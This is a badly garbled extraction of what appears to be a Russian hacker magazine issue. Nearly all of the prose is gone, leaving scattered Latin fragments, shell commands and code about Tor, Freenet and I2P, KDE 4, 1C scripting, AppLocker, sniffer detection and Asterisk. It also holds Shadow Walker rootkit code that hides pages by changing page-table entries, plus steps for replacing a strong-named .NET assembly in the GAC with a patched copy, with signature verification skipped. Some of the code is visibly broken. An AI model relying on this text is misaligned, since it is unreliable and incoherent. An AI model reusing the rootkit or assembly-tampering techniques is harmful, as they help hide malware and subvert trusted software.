,
Tor-
, .
.
, ,
.
, .
, ,
, ,
.
Tor,
, (
). , Tor , ,

, ,
.
,
.

Tor-,
.

.

.
Tor-, DNS-, ,
Tor-,
DNS-, , .
,
Tor Privoxy,
DNS-,
OpenDNS TorDNS.

. , , JavaScript-, . JavaScript ,
- Privoxy
Firefox- Torbutton.
Tor
.
Tor- HTTP- Privoxy,
HTTP- Tor.
089
UNIXOID
Torchat Python - ,

python2.5, python-wxgtk2.8 torchat.
py, .
Freenet
Ubuntu Tor- ,
. /etc/
apt/sources.list :
deb http://deb.torproject.org/
torproject.org karmic main
:
$ gpg --keyserver keys.gnupg.net
--recv 886DDD89
$ gpg --export A3C4F0F979CAA22CDBA8
F512EE8CBC9E886DDD89 | sudo apt-key
add -
apt- :
$ sudo apt-get update
$ sudo apt-get install tor torgeoipdb privoxy
Privoxy
:
forward-socks4a / 127.0.0.1:9050 .
,
Tor
. https://
check.torproject.org Tor. .
Tor
Privoxy (localhost:8118)
SOCKS- Tor (localhost:9050) . ,
wget, lynx, apt ,
Tor, ~/.bashrc :
export http_
proxy=http://127.0.0.1:8118/
export HTTP_PROXY=$http_proxy
SOCKS SSH Tor,

socat:
$ sudo apt-get install socat
SSH (~/.ssh/config)
:
Host *
ProxyCommand socat STDIO SOCKS4A:12
7.0.0.1:%h:%p,socksport=9050
Privoxy:
$ sudo /etc/init.d/privoxy start
Torbutton Firefox.
https://addons.
mozilla.org/firefox/2275/
apt:
$ sudo apt-get install torbuttonextension
090
Tor
, ,
-
.
Torchat (https://code.
google.com/p/torchat/), Tor,
.
Onion Routing (
Mix network)

Mixminion
(http://mixminion.net).
,
,

, ,
.
mixminion
email-
, .
,

.
:

28 ,
, .

Freenet (http://freenetproject.org)
(Ian Clarke), 1999
A Distributed, Decentralised
Information Storage and Retrieval System

,
.
Freenet
, ,

.
Tor, Freenet
,
.
Freenet
,
,
. , , , .
,
.
: , Freenet,

- .
Freenet
,
- ( SHA-1)
X 01 /133/ 10
INFO
info
I2P

Freenet,
,
. , ,
,

.
. ( Freenet
), ,
, ,
.
,
.
, ,
.

,
, .
, ( ).
Freenet .
,
:
* Frost ,
,
Freenet, .
* jSite
, , Freenet-.
* Thaw .
* freemulet , .
* Freemail .
, -
Freenet X 01 /133/ 10
.
Freenet- ,
IM-.
Freenet Java,
:
$ sudo apt-get install sun-java6-jre
$ sudo update-java-alternatives -s java-6-sun
:
$ wget http://downloads.freenetproject.org/
alpha/installer/new_installer.jar
$ java -jar new_installer.jar
. Freenet ( ,

run.sh) , Web, .
http://127.0.0.1:8888. FProxy, Freenet- Freenet.
Freenet-. Freenet-
http://127.0.0.1:8888/config/.
,
.
Tor
,

13- USENIX , 13
2004 .

BSD.
Vidalia TorK

Tor,
Qt4.
Tor

-.
Tor
( .onion),

, .

Freenet
,
TCP/
IP- . I2P (Invisible
Internet Project/Protocol) ,
,
Freenet .
Freenet, I2P
. Tor,
I2P Freenet. , I2P
TCP/IP ,
DVD
dvd

LiveCD
Incognito.
091
UNIXOID
ADEPT ADEPTG@GMAIL.COM
I2P
, (
I2P Tor).
I2P , .

( I2P),
-,
- .

(,
),
, ,
IP-,
.
10 .
I2P
,

-. ,
Freenet-. ,
I2P, :
* I2PSnark I2P. .
* I2P-BT BitTorrent
3.4.2 I2P.
* I2PRufus Rufus I2P.
092
* I2Phex gnutella- Phex

I2P.
* iMule eMule I2P.
* Susimail
I2P.
* Syndie .
, ,
Azureus,
I2P.
Freenet, I2P
Java .

:
$ wget http://mirror.i2p2.de/
i2pinstall-0.7.7.exe
$ java -jar ./i2p_install-0.7.7.exe
, ,
, .

:
$ ./i2prouter start

: http://127.0.0.1:7657/index.jsp.
HTTP-: 127.0.0.1:4444.
I2P .i2p,
orion.i2p, :
search.i2p eepsites.i2p.
,
. , http://orion.i2p/hosts.
txt (http://
localhost:7657/susidns/subscriptions.jsp).

LiveCD Incognito (www.anonymityanywhere.com/
incognito/) .
,
.
Tor,
Firefox Torbutton.
, SOCKS HTTP-, . :
* Firefox + Tor + Torbutton WWW.
* TrueCrypt
.
* Enigmail Thunderbird-
.
X 01 /133/ 10
Tor
* FireGPG Firefox, ,
Web.
* GnuPG OpenPGP.
* KeePassX .
* Miminion .
USB . , . MAC-
.

,
. :
* -
* Bruteforce-
*
-
.

,
.
Bruteforce- , . , -
.
X 01 /133/ 10
Torbutton

/ .

.
.
,
. ,
.
Freenet I2P,
. Tor, ,
(), ,
(
). z
093
UNIXOID
zobnin@gmail.com
KDE
7 KDE 4
KDE 4 7 ,
KDE (Pillars of KDE), . , KDE 4 ,
.
, 7 KDE 4:
Solid API
.
Phonon API.
Decibel API
.
Akonadi PIM.
Nepomuk .
Plasma .
Oxygen .
SOLID
KDE 4 ,
BSD Windows.

,
.
KDE 4, ,
Solid API.
094
Solid
,
API
.
Solid HAL ,
,
, HAL, NetworkManager BlueZ.

, Solid,
.
Solid
. KDE 4 .
NetworkManager, KDE
.

,
.
, ,
.
PHONON
aRts KDE 2 API,

,
( Linux,
BSD
).
aRts KDE KDE 3, - ,

, KDE 4
- Phonon.
aRts, Phonon
, ,
, X 03 /134/ 10
DECIBEL

(, Skype
, Kopete
),
(,
Phonon,
), Solid
(,
USB- Phonon
Skype ).
Phonon . API , , API
. , Phonon API
C++
( aRts 30):
media = new MediaObject(this);

connect(media, SIGNAL(finished()),
SLOT(slotFinished()));
media->setCurrentSource("/home/
username/music/filename.ogg");
media->play();
Phonon ,
, ,
Xine GStreamer UNIX-
DirectShow Windows
(
,
).
, , , , .
. KDE 4, ,
,
.
KDE 2002, 7 , IT-. , , .
(Kicker, Kdesktop, aRts) KDE 2 ,
, , . ,
SuperKaramba, , , . ,
, .
, , , . KDE 3 , ,
.
KDE 4 , .
.
KDE 4 ,
GNOME ( 2.30, , , KDE 4.0),
2 ,
.
turbina (v.turbina@gmail.com), , z 2008 .
X 03 /134/ 10
KDE 4
, , IP- (VoIP),
(IRC, ICQ, Jabber).
Decibel Telepathy API (
freedesktop.org)
Tapioca. ,
.
KDE 4, , ( )
Decibel.
Decibel , ,

, ,
.
AKONADI
KDE 3 ,
,
,
. Kmail, Kontact , ,

, ,
,

, , . KDE
4
,
Akonadi.
, Akonadi PIM (Personal Information Management,
),
- ,
,
,
.
Akonadi , ,
,
, ,

,
, API
, . Akonadi
,

.
, Akonadi
:
, ,

,
.
095
UNIXOID
KDE 4.4
Desktop File Indexer.

Advanced Settings,
.
Apply Strigi
.
KRunner
.
PLASMA
Akonadi
NEPOMUK
NEPOMUK (Networked Environment for
Personalized, Ontology-based Management of
Unified Knowledge,
) ,
, nepomuk.semanticdesktop.org
KDE .
KDE 4
.

,
Nepomuk
, ,

. ,

,
.
, KDE-
Nepomuk Strigi,
(,
mp3-). ,
, ,
Dolphin ( ,

, ,
). ,
,
,
KRunner (Alt+F2).
Nepomuk
.
, (System Settings),
Advanced, Desktop
Search Enable
Nepomuk Semantic Desktop Enable Strigi
PLASMA
, C++, JavaScript, Ruby Python
Google Gadgets
SuperKaramba
QEdje, Edje E17
Mac OS X
- HTML JavaScript
096
KDE 1
KDE.
. KDE 2

, :
,
, ,
, ,
. KDE 3 SuperKaramba
KDE, .

,
.

. .

C++.
KDE 4
KDesktop, Kicker SuperKaramba ,
Plasma.
Plasma
, , , , .
, Plasma
KDE 4
API .
, Plasma , .
Plasma
X 03 /134/ 10
nepomuk
Plasma : Plasma :
,
, , ..,
, , . Plasma
: , , , ,
, (
,
).
, ,
, - , ,
( ),
KDE 4, ,
,
, , , ,
, .
Plasma Kross,
KDE C++, JavaScript, Ruby Python.
, Plasma ,
,
Plasma Google
Mac OS X (, ,

).
Plasma . KDE
4
.
- ,
..
.
,

Plasma
. ,
Plasma-Netbook
. ,
, ,
.
, Google Summer of Code (Alessandro Diaferia)
, Plasma.
Plasma
.
,
, Plasma KDE 4
: activity. X 03 /134/ 10
KDE 4 - . , ,
-
, , , ,
, ..
KDE ,
.
, , ,
, ,

.
, ,
.

Zoom Out.

, Add Activity. . Zoom In
, . .

Zoom In Zoom Out ,

. Zoom Out, Configure
Plasma Different activity for
each desktop.
INFO
info

KDE, ,

.
, KDE 4.5
.

Phonon

KDE 4.0 2008-.

Qt 4.4.
OXYGEN
Oxygen KDE 4, , , . : Oxygen
KDE 4,
Qt4-, , Plasma,
, .. Oxygen ()
,
KDE 4.
, KDE 4 ,
. ,
.
,
, KDE 4.8
,
KDE 4.3. z
097
CODING
antonov.igor.khv@gmail.com,
www.vr-online.ru
1:
-
1: .
.
/
. ( 1) .
X- ?
098
X 03 /134/ 10
, 1:,
, ,
. , , 1:
: 7.7, 8.x. ,
.
7.7 . ,
. . . ,
,
. .
, ,
.
1: , / ( ). ,
7.7 -
. , .
.
,
,
.
,
, .

Delphi, Visual C++.
. ? ,

.
, DLL . ,
WinAPI-,
99% ,
, .
8 .
, .
,
1: 8
WinAPI-. ,
. ?, .
: . , : FTP, HTTP, XML,
SMTP, POP3 . . ,
?
1:
, .
, ,
. - 1? ,
, 1:,
. .
: ,
..
1: .
,
. ,
1: !
X 03 /134/ 10
FTP-
SMTP- -?

- .
1:
#, Python, Delphi . . ,
.
, .
, .
1:
. .
-,
.
.
/: ,
.
,
1:, ,
, .
1: .
/
.
,
. var
099
CODING
(
). .
.
. :
= "Hello, world!";
//
= 0;
//
= (); //
1: . :
//
()
//
(1, 2)
//
(1, 2)
1 + 2;
.
. :
// . while..do
//
// 1 9
//
= 1;
<> 10
();
100
1:
= +1;
;
// .
//for..to..do
// 1 10
//
= 1 10
();
;
// .
//foreach
//
= (2);
[0] = 1;
[1] = 2;

();
;
X 03 /134/ 10
>> coding
SMTP-
,
, 1::
//
//"....|.
// "IF..THEN..ELSE"
// .
= 5;
( = 1)
(" ");
( = 2)
(" ");
(" ");
;
X 03 /134/ 10
1: :). , , .
.
.
FTP-
FTP- . , MS Office,
? ,
(, )? ,
FTP-. WWW, , FTP, POP3, SMTP,
. .
FTP-. , ,
.
101
CODING
, 1:
.
, IDE,
.
. .
1: FTP
: FTP. .
PROXY-, / . . , . ,
:
FTP- 1:
= "";
= "";
= " ";
= " ";
FTP = FTP(,
, , );
FTP.(
);
(" FTP
| !",
.);
(());
;
;
FTP.(
..,
.1.);
(" !",
.);

http://infostart.ru/public/20144 ICQ-,
. C#
.NET- IcqSharp 0.4.0.0.
1?
!
http://infostart.ru/public/14457
. ,

.
http://infostart.ru/public/20223

1: 8.x. ,
-.
http://infostart.ru/public/16332 ,
. ,
FTP-, , , , .
1: .
?
102
(());
;
FTP
FTP.
:
FTP- ()
FTP- ()
FTP-

, PROXY- ()
()
, FTP- .
. , ().
().
FTP-. ,
.....
, , .
FTP- 1: ,
. ,
. , ,
1:, ,
. /
. (.
).

1: , , .
, , .
:
, , ..
( , ), .
, .
,
.
. , , ,
.
smtp-
( ).
. / .

.
.
. . , ,
.
RSS- .
.
Google Reader,
.
1:,
.
RSS- XML-. , , XML . ,
X 03 /134/ 10
>> coding
RSS-
= RSS.selectSingleNode(
"//channel/description").Text;
= RSS.selectNodes("//item");
= 0 .length-1
= .item().childNodes;

= ;
. =
..;
. =
..;
.. =
..;
= ();
2 = 0 .length-1
.
(.item(2).nodeName,
.item(2).text);
;
= ": ";
(.("title"))
= +
.title;
;
= ..();
. =
..;
= ..();
. =
.;
. = ;
(
(..))
..(
..);
;
= " : ";
(.("pubDate"))
= +
RFC822(.pubDate);
;
= " : ";
(.(link))
= + .link;
;
//
= ;
.SMTP =
..;
.SMTP =
..;
.SMTP =
SMTP.;
.SMTP =
..;
= ;
= " : ";
(.("description"))
= +
.description;
;
("--------------------------");
();
();
();
();
("--------------------------");
;
RSS-. Delphi.
XML COM- Microsoft.XMLHTTP.
, 1:
. RSS- .
OUTRO
, ,
, 1:.
, . , X 03 /134/ 10
.();
(" !
: " + (),
.);
;
;
//
.();
(" !",
.);
(" !" +
(),
.);
;
.();
, ,
. ! z
103
CODING
stannic.man@gmail.com
WINDOWS
-

.
32- 4
. 64- ,
,
.

,

(
). ,
, Windows.
,

.
, ?

, , Windows, . ,
Windows :
1) 4
2)
, , .
104
?
( ,
4 , 4 ), (
, 1
).
,

.

,

.

,
.

(page frames),

(paging).
. ,
,
, (
)
. , -
,
- .
, ,
( ): ,
.

, ,
,
,
( )
? ! ,
, !
X 03 /134/ 10
PTE
0xe4321000
CR3
PT
PD
0x321
0x300
0x390
GetPteAddress:
Oxe4321000
=>0xc0390c84
PTE
1100 0000 0011 1001 0000 1100 1000 0100

PTE
-, .
, ,

. (
), ,
.
: (Page Directory, PDE),
(Page Table, PTE)
(Page Frame). ,
,
INTEL ;
www.intel.com
.
PDE
PTE? !

PTE: ((PTE*)(((((ULONG)(VirtualAddress))
>> 12) << 2) + PteBaseAddress)), PteBaseAddress
0xC0000000. ,
PTE: = ( VirtualAddress >> 10)+0xc0000000.
,
PTE :
VirtualAddress = PTE << 10.
, , . ,
32- : 1100000000.0000000101.0000001001.00
b ( ). ,
PTE 1001b 101b.
, , ,
X 03 /134/ 10
HTTP://WWW
links

-
Windows?
gr8.cih.ms/index.
php?entry=entry008

wasm.ru
Great .

Windows,
, www.informit.
com/articles/article.
aspx?p=167857.
INFO
. Mm*.
WriteProcessMemory
ReadProcessMemory, . ,
MmGetPhysicalAddress
, , .
MmIsAddressValid() - ,
, ..
Page Fault
. ,
FALSE.
MmIsNonPagedSystemAddressValid,
MmIsAddressValid ,
. , /
, ,
. !
,
,
!
info

!
DVD
dvd

,

.
Shadow Walker
.

, () .

#PF Page Fault ,
( )

.

. !

Windows . ?
, (
) , -
105
CODING
#PF #GP
NtQuerySystemInformation
c SystemModuleInformation
\Driver ZwQueryDirectoryObject.

PsLoadedModuleList ( , , ).

PsLoadedModuleList.
Shadow Walker
.

, Shadow Walker
FU. ,
,
.
INT0E
,
,
#PF PageFault.
, ?
(
) , PTE
, Shadow Walker , ,
; , .
,
106
Shadow Walker PTE

. , ,
:
. Shadow Walker
;
, ,
.

VOID MarkPageNotPresent(
PPTE pPte )
{
__asm
{
mov eax, pPte
and dword ptr [eax], 0xFFFFFFFE
}
}
,

. ? ,
,
,
. Shadow Walker ;
http://
www.ht-group.net/32, .
,
,
. ,
,
KeAttachProcess. , ,
. ,
, ,
, ZwWriteProcessMemory, z
. !
-
,

. ( ,
!),

, ;
PTE
!
,

, !
:
X 03 /134/ 10
>> coding

.
?
PTE
DWORD ChangePTEOfTarget(DWORD VirtualAddressOfTarget,
DWORD NewVirtualAddress)
{
DWORD vaTargetPTEaddress;
DWORD vaTargetPTE;
DWORD NewVAPTEaddress;
DWORD NewVAPTE;
DWORD source;
source = VirtualAddressOfTarget;
source = source >> 12;
source = source << 2;
vaTargetPTEaddress = 0xC0000000 + source;
vaTargetPTE = *vaTargetPTEaddr;
source = NewVirtualAddress;
source = source >> 12;
source = source << 2;
NewVAPTEaddress = 0xC0000000 + source;
NewVAPTE = *NewVAPTEaddress;
X 03 /134/ 10
__asm cli
vaTargetPTEaddress = source;
__asm sti
return source; }
. , . ,
( !)

.
, ,
, , Windows ,
. , The matrix has you, Neo!.
Windows ,
.
.
! z
107
CODING
ALEXEYBBB@GMAIL.COM
-
z
.NET

.NET. , ,
GAC.
,
.

(
)
. ,
,
.

.
.
,
:
signedLib.dll
namespace signedLib
{
public class sLib
{
public static int GetNumber()
{
return 1;
}
}
}

:
changeKey.exe
namespace changeKey
{
108
class Program
{
static void Main(string[] args)
{
Console.WriteLine(
signedLib.sLib.GetNumber());
Console.ReadLine();
}
}
}
. .NET Reflector [1] Reflexil [2]

IL- (signedLib.dll), GetNumber()
1, 2. 2.
: /
. , ,
, ,
.
,
, GAC
.
GAC
,

.
, ,
.
,
GAC, .
. ,

( .
, :)). , GAC,
.
. GAC , . ,
! ?
:

.
.
, ,
GAC.
sn.exe (, , sn.exe
). ,
signedLib.dll (
). GAC.
gacutil.exe /i D:\projects\
changeKey\signedLib\bin\Release\
signedLib.dll
X 03 /134/ 10

C:\WINDOWS\
ASSEMBLY
changeKey.
exe. , , signedLib.dll ( ,
GAC). changeKey.exe 1.

, . ,
GetNumber() 1, 2.
C:\Windows\assembly
Windows . ,
:

GAC ,

.
dll , sn.exe:
info
subst b: C:\Windows\assembly
sn -Vr C:\Users\Alex\Desktop\signedLib.dll
B.
.Net- GAC_MSIL;
( .dll ).
, , , signedLib.
dll. signedLib.dll .
.NET Reflector
Reflexil (
) .
(
). ,
, .
IL-
, .
Remove Strong Name . (
Register it for verification skipping,
; ,
).
:
, dll;
.
GAC.
.
,
,
( -
).
.NET Reflector ,
( ).
HasPublicKey (

sn.exe ).
, , ,
,
. , GAC,
, ( ). ,
X 03 /134/ 10
INFO
GAC:
gacutil /u signedLib,Version=1.0.0.0,Culture=
neutral,PublicKeyToken=2b1b71846e76146e
:
gacutil /i
C:\Users\Alex\Desktop\signedLib.dll
, gacutil.exe :
Assembly successfully added to the cache
,
GAC. ( ), changeKey.
exe, 1. ,
2!
DVD
dvd

. :
(, );
.
CAG, :
1. dll- C:\Windows\assembly
( subst).
2. .
3. IL- .
4. , 2 ( ).
5. .
6. GAC.
7. .
5-7
. !

. z
109
CODING
deeonis deeonis@gmail.com
C++
++.

, , ,
CPP- .
,
,
INLINE-
.
1
, ,

(backround).
.
110

changeBackround:
PrettyMenu
class PrettyMenu {
public:
void changeBackround(
std::istream& imgSrc);
private:
X
X
0
03
3 // 1
13
34
4 // 1
10
0
Mutex mutex;
Image *bgImage;
int imageChanges;
};
void PrettyMenu::changeBackround(std::istream& imgSrc)
{
lock(&mutex);
delete bgImage;
++imageChanges;
bgImage = new Image(imgSrc);
unlock(&mutex);
, - , ,
, . , ,
, ,
, . ,
. C++
, ,
, bad_alloc.
changeBackround
. -, bgImage ( ). , ,
. -,
changeBackround,
, .
:
, . ,
: .
changeBackround,
new Image(imgSrc), ,
unlok.
,
. .
changeBachround
:
Lock
{
Lock ml(mutex);
delete bgImage;
++imageChanges;
bgImage = new Image(imgSrc);

class PrettyMenu {
public:
std::tr1::shared_ptr<Image> bgImage;
};
{
Lock ml(mutex);
bgImage.reset(new Image(imgSrc));
++imageChanges;
}
; . ,
. ,
, .
, someFunc, f1 f2:
, ,
(
), .
.
new Image(imgSrc) , bgImage
. , imageChanges ,
, . ,
.
:
;
;
.
,
. ,
imgSrc bgImage
. .
, . .
,
.
:
. , X 03 /134/ 10
void someFunc()
void someFunc()
{
f1();
f2();
, f1 f2 ,
someFunc. ,
, .
, f1 , f2 .
someFunc
, f1 , , -
(,
f1 ).

. .
,
.
111
CODING
, .
, , ,
,
.
.
C++. inline , , .
, , ,
, .
, . ,
,
. , ,
, ,
, .
; , , ,
.
inline , ,
, . -
,
:
inline-
class Person {
public:
//
int age() const { return theAge;}
private:
int theAge;
};

class Base {
public:
private:
std::string bm1, bm2;
};
class Derived: public Base {
public:
Derived(){}
private:
std::string dm1, dm2, dm3;
};

, .
. C++ . ,
, ,
. . .
;
.
. , Derived
:
,
Derived::Derived()
{
Base::Base();
try {dm1.std::string::string();}
catch(...) {
Base::~Base();
throw;
}
,
,
. virtual , , inline . ,
, .

.
, , ,
. ,
- :
catch(...) {
dm1.std::string::~string();
Base::~Base();
throw;
}
catch(...) {
Base::~Base();
throw;
}
inline-
inline void f() {}
void (*pf)() = f;
//
f();
// , ,
pf();

. :
112
, ,
,
, . .

inline-. ,
,
X 03 /134/ 10
. ,
, ,
.
inline,
. ,
,
,
inline.
, ,
, .
, .
: C++, - . ,
, . ,
(,
private), , .
, , .
, C++ - :

#include <string>
#include "date.h"
#include "address.h"
class Person {
public:
Person ( const std::string& name,
const Date& birthday,
const Address& addr);
std::string name() const;
std::string birthDate() const;
std::string address() const;
private:
//
std::string theName;
Date theBirthDate;
Address theAddress;
};
, C++

.
,
C++. :
- . , :
, . ,
, PersonImpl, Person :
-
#include <string>
#include <memory>
X 03 /134/ 10
//
class PersonImpl;
class Date;
class Address;
class Person {
public:
Person ( const std::string& name,
const Date& birthday,
const Address& addr);
std::string name() const;
std::string birthDate() const;
std::string address() const;
private:
std::tr1::shared_ptr<PersonaImpl> pImpl;
};
Person ,
.
Person , .
, , Person, .
- Person
.
, ( ), -.
( ),
:

class Person {
public:
virtual
virtual
virtual
virtual
~Person ();
std::string name() const = 0;
std::string birthDate() const = 0;
std::string address() const = 0;
};
Person,
, .
, -,
,
.
-.
, (, ) .
.
,
, .
. C++ . .
, C++ ,
. z
113
SYN/ACK
urban.prankster martin@synack.ru
,

,
. ,
, , , ,
Windows.
(, , ),
. , .
(GPO) , Windows.
. ,
,
,
. , ,
( -) GPO
.
,
Microsoft c Group Policy
Settings Reference .
Win2k8 GPO Group Policy
Management Console (GPMC.msc) 2.0.
Windows
(Computer Configuration Windows Settings
Security Settings).
, ,
, ,
, , , NAP, IP-
.
.
114
.

.
,
,
, ,
.

(Load and Unload Device)
; ,

. ,

, , .
, , , ,
. ,
.

,
. , :

,
(
). ,
,

, ,
.

Vista Win2k8.

DeviceLock.

.

GPO

(Software Restriction Policies, SRP).

,
WinXP .
: ,
, . : ,
, .
, .
GPO SRP,

X 03 /134/ 10
.
SRP . ,
( )
(New Software
Restriction Policies).
(Unrestricted),
NTFS .
, . , ,

(Disallowed), , . (Basic User), GPO, Vista,
,
, , .
,

(Set as Default). ,
,
. .
. SRP , %SystemRoot% %ProgramFilesDir%.
.
.
4 .
: ( , ),
(, ), ( , , , )
(, Microsoft, Adobe ..). ,
, .
X 03 /134/ 10
. , ,
( ) ,
.

, .
(Enforcement) ,
, SRP DLL
( ). DLL' ,
, ,
. ,
.
.
.

, .
, - ,
/ . , ,
, ( / ) ,
.
.
APPLOCKER SRP
, ,
,
. , ,
. Win7/Win2k8R2
SRP AppLocker. , SRP
, . SRP, Applocker
, : .
AppLocker Security Settings (secpol.
msc) Application ontrol Policies. ,
,
:
Executable Rules exe, com src;
Windows Installer Rules msi msp ;
115
SYN/ACK
INFO
info
,
IM, Skype, P2P

, z 2009
.
Script Rules bat, cmd, js, ps1 vbs .

Default,
GPO.
:
Enforced , ,
, ;
Audit Only ; ,
, .
AppLocker.

Enforcement AppLocker.
Advanced Enable DLL rule
collection, DLL.
SRP,
. ,
( NTFS, ), SRP,
. AppLocker
.
:
Create New Rule (Publisher), (Path, )
(File Hash);
Automatically generate Rules
, ,
(Path/Hash)
;
Create Default Rules .

Windows (%WINDIR%) Program Files
(%PROGRAMFILES%); ,
(BUILTIN\Administrator),
.

Enforced,
, .
.
,
: ,
, , (Action)
.
AppLocker
, ,
,
, .
Exceptions
. Add,
, ,
.
.
, , , ,
AppLocker .
Default Rules
. Create New
Rule
. ,
Allow/Deny
, .
Publisher/Path/File Hash
, ,
PROMISCAN
116
X 03 /134/ 10
, SRP
. AppLocker
. , C:\
soft, %OSDrive%\soft\*.
, : %WINDIR%,
%SYSTEM32%, %PROGRAMFILES%, %REMOVABLE% (CD/
DVD) %HOT% (USB-). , AppLocker,
, .
, ,
Application Identity (AppIDSvc).
Services (services.msc)
(Security Settings System Services).
:
> gpupdate /force

(, SCCM,
,
z 2009 ).

(AppMgmt), , .
NAT'

. , ,
, ( ),
,
.
, -
WiFi . , ,
. , ,

, (+ ).
- NAT
TTL,
IP- TCP/UDP ( NAT
X 03 /134/ 10
TTL WIRESHARK
z #111).
.
Wireshark (wireshark.org) (Windows, Linux, xBSD, Solaris, Mac OS X ..)
. :
(, ,
),
.
- NAT
TTL ( ) IP-.
,
TTL, , Windows 128,
Linux 64 ( 255),
. ,
TTL 63 127 ( ),
NAT (
- NAT).
IP only ip.ttl
, TTL 64 128.
,
,
, ,
.
,
Wireshark .
tshark -D,
TTL .
HTTP://WWW
links
TechNet,
technet.
microsoft.com/enus/windowsserver/
grouppolicy.
Wireshark
wireshark.org.
BWMeter
desksoft.com/
BWMeter.htm.
proDETECT
sf.net/projects/
prodetect.
PromiScan
securityfriday.com/
products/promiscan.
html.
> tshark -i 1 -e ip.ttl -Tfields
tcpdump- ,
IP (ip[8] <
64, TTL 8- IP-).
Wireshark BWMeter
(desksoft.com/BWMeter.htm),
,
.

, .
, : Kerio WinRoute
( -
, z 2007
), UserGate Proxy & Firewall ( -
117
SYN/ACK
PROMQRY MICROSOFT
, z 2009 ), ISA
Server/Forefront TMG (
, z 2009 ) ,
.
,
Nmap (nmap.org)
.

.
, , -,
.
LAN
,
, .

, ,
, ,
.

(promiscuous mode),
, .

,
:

NIC promiscuous mode , ,
118
;

;
,
, ARP- IP
, -.

.
ARP-
:
> arp -s hackerhost
00:11:22:33:44:55
> ping hackerhost
, ,
,
.
:
> arp -d hackerhost
. ,
proDETECT (sf.net/projects/prodetect), , , , .

. e-mail.
PromiScan (securityfriday.
com/products/promiscan.html)
IP
. , ,
. .
, Microsoft

Promqry PromqryUI,
(support.microsoft.com/
kb/892853). ,
GUI. : IP-

Start Query.

, ,
.
,
.
,
LAN;

, ,
- IP-,
, URL
. z
X 03 /134/ 10
Sergey Jaremchuk feat. Andrey Matveev

ASTERISK
-
. IT- : , , , .
, IP-PBX Asterisk
.
,
, . IP-PBX Asterisk,
?
:
,
( IPsec-
),
- .
, VoIP:
, IVR ( ,

call-), GSM- ..

,
IT- (
)
.
, Asterisk.
,
.
Asterisk'a SIP (Session
Initiation Protocol, RFC 3263), IAX2
(Inter-Asterisk eXchange protocol,
VoIP- IP-PBX Asterisk,
RFC 5456). ,
IAX2
- NAT.
(4569/UDP)
X 03 /134/ 10
(..

, ) .

.
,

. ,
SIP, IAX2
, ,
.

iax.conf.

.
$ sudo nano /etc/asterisk/iax.conf
; Asterisk
[general]
;register =>
<username>:<password>@< IP
>
register => userB:password@synack.
ru
;
[synack]
type=friend
user=username
secret=password
host=synack.ru
context=synack

:
$ sudo nano /etc/asterisk/extensions.conf
[synack]
exten => _5XXX,1,NoOp()
exten => _5XXX,n,Dial(IAX2/
synack/${EXTEN})
exten => _5XXX,n,Hangup()
, ,
.
iax.conf . ,
,
register.
$ sudo nano /etc/asterisk/iax.conf
[office]
type=friend
user=user
secret=password
host=dynamic
; IP-
deny=0.0.0.0/0
permit=11.22.33.44
context=office
extensions.conf
:
exten => _8XXX,1,
Dial(IAX2/office/
${EXTEN})
119
SYN/ACK
IP-PBX Asterisk, ,
.
. ,
. , Asterisk
.
, :
exten => 3000,1,GotoIfTime(9:00-18:00|monfri|*|*?OUT,s,1)
, !
SIP-
SIP-, , .
,
. Asterisk ,
SIP- ,
,

-.
,
. ,
SIP'
sipnet.ru.

IAX2. SIP
sip.conf.
$ sudo nano /etc/asterisk/sip.conf
[general]
...
useragent=SipPhone
register=myusername:mypassword@sipnet.ru/2223322
;
disallow=all
allow=ulaw
allow=alaw
120
allow=gsm
[sipnet]
type=friend
username=myusername
secret=mypassword
callerid=sipnet
host=sipnet.ru
nat=yes
fromuser=sipnet
fromdomain=sipnet.ru
dtmfmode=rfc2833
insecure=invite
context=sipnet
SIP. , , FAQ
,
.
:
[sipnet-in]
exten => 101,1,Set(CALLERID(name)="Sipnet call")
exten => 101,n,Dial(SIP/101,20)
exten => 101,n,Playback(vm-nobodyavail)
exten => 101,n,Voicemail(101)
exten => 101,n,Hangup()
[sipnet-out-moscow]
exten => _749[59]ZXXXXXX,1,Set(CALLERID(all)="SipPhon
e" <2223322>)
exten => _749[59]ZXXXXXX,n,Dial(SIP/sipnet/${EXTEN},20)
exten => _749[59]ZXXXXXX,n,Hangup()
CALLBACK ,
, . ,
X 03 /134/ 10
A2BILLING

.
?
. :
, ,
- ,
, , ,
..
Asterisk
, . /
var/lib/asterisk/outgoing .call-,
Asterisk
. extensions.conf
:
[IncomingCall]
; , ,

exten => s,1,GotoIf($["${CALLERID(num)}" =
"9151234567"]?callback)
; ,

exten => s,n,Goto(normal) ;
,
exten => s,n(callback),System(/etc/asterisk/
scripts/callback 8${CALLERID(num)} &)
exten => s,n,Hangup()
exten => s,n(normal)
; ,
[InternalCall]
exten => 123,1,Dial(SIP/123)
exten => 123,n,Hangup()
exten => _89X.,1,Dial(SIP/${EXTEN}@GW_IP)
exten => _89X.,n,Hangup()
, call. , , System,
:
exten => h,6,System(echo Channel:
SIP/${CALLERID(num)} > /tmp/${CALLERID(num)}.
call)
:
$ sudo nano /etc/asterisk/scripts/callback
#!/bin/sh
sleep 5
X 03 /134/ 10
CALLBACK ELASTIX
cat << EOF > /tmp/$NUMBER.call
# ,
NUMBER=$1
# ,
echo "Channel: SIP/$NUMBER@InternalCall
# (.. 1 2 )
MaxRetries: 1
# ,
RetryTime: 30
#
WaitTime: 30
Context: InternalCall #
Extension: 777 #
Priority: 1
AlwaysDelete: Yes" >/var/spool/asterisk/
tmp/$NUMBER
EOF #
#
chown asterisk:asterisk /tmp/$NUMBER.call
mv /tmp/$NUMBER.call /var/spool/asterisk/
outgoing/
: , Asterisk
call-,
.
outgoing ;
Asterisk , , .
outgoing .
, .
, Callback web,
, call-
CGI-. .

, Callback
.
(,
), Asterisk . InternalCall
.
,
PIN
INFO
info

call-
AMI (Asterisk
Manager Interface)
Asterisk.

5038 .

AstBill
,

z 2008 .
121
SYN/ACK
FREEPBX
ASTERISK
HTTP://WWW
links
Asterisk
A2billing (www.
asterisk2billing.org),
Asterisell (asterisell.
profitoss.com).

CDR
Asterisk Queue/
CDR Log Analyzer
(www.micpc.com/
qloganalyzer),
Asterisk-Stat (www.
areski.net/asteriskstat-v2).

Asterisk
asteriskpbx.ru/
browser/astpbx/etc/
asterisk.
122
CDR- ASTERISK QUEUE/CDR LOG ANALYZER
.
Asterisk PIN-,
( ).
, .
, () allback SMS-, e-mail,
( ,
z 2009 ), (,
) . ,
.call-,

.

Asterisk, .
A2billing (www.asterisk2billing.
org), Asterisell (asterisell.profitoss.com), astCDRview
(astcdrview.berlios.de), AstBill (astbill.com), 9
10 . ,

